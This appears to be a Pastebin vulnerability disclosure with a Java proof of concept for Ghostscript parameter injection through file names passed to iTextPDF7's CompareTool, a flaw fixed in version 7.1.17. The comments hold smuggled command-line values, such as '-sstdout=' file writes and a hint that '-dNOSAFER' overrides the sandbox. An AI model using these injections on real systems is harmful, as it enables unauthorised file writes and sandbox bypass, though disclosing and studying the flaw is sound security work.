Advertisement
Guest User

iTextPDF7 Parameter Injection PoC

a guest
Nov 14th, 2021
9,602
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 1.55 KB | None | 0 0
  1. /*
  2. Title: iTextPDF7 Java Ghostscript Parameter Injection
  3. Software: iTextPDF7 (Java version)
  4. Version: <7.1.17
  5. Vulnerability: Parameter Injection
  6. Credits: Gabriele Zuddas (gzuddas[_@t_]mentat.is)
  7. Description: An attacker controlling the filename passed to the CompareTool class, is able to inject arbitrary parameters in the command line being executed (ghostscript). The vulnerable code resides inside the com/itextpdf/io/util/GhostscriptHelper.java.
  8.  
  9. Notes: Vendor quickly acknowledged and fixed the vulnerability starting from version 7.1.17 (https://github.com/itext/itext7/releases/tag/7.1.17)
  10. */
  11.  
  12. //To compile: javac -cp ".:*" Example.java
  13. //PoC Payload: ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example 'a.pdf" -sstdout=hi.txt # '
  14.  
  15. import com.itextpdf.kernel.utils.CompareTool;
  16. //Parameter injection: javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "a.pdf\\\" -?"  
  17. // javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" - \0"
  18.  
  19. public class Example {
  20.    public static void main(String args[]) throws Exception {    
  21.       CompareTool c = new CompareTool();
  22.       c.compareVisually("a.pdf", args[0],  ".", ".", null);
  23.    }
  24. }
  25.  
  26.  
  27. //$ITEXT_GS_EXEC  -dSAFER -dNOPAUSE -dBATCH -sDEVICE=png16m -r150  -sOutputFile="./cmp_xxx.pdf" - yyyyy-%03d.png" "xxx.pdf" - yyyyy"
  28.  
  29. //-dNOSAFER overrides -dSAFER
  30.  
  31. //javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" -sstdout=a.txt"
  32. //DROPS a file called 'a.txt-%03d.png\ xxx.pdf\ -sstdout=a.txt' on the filesystem
  33.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement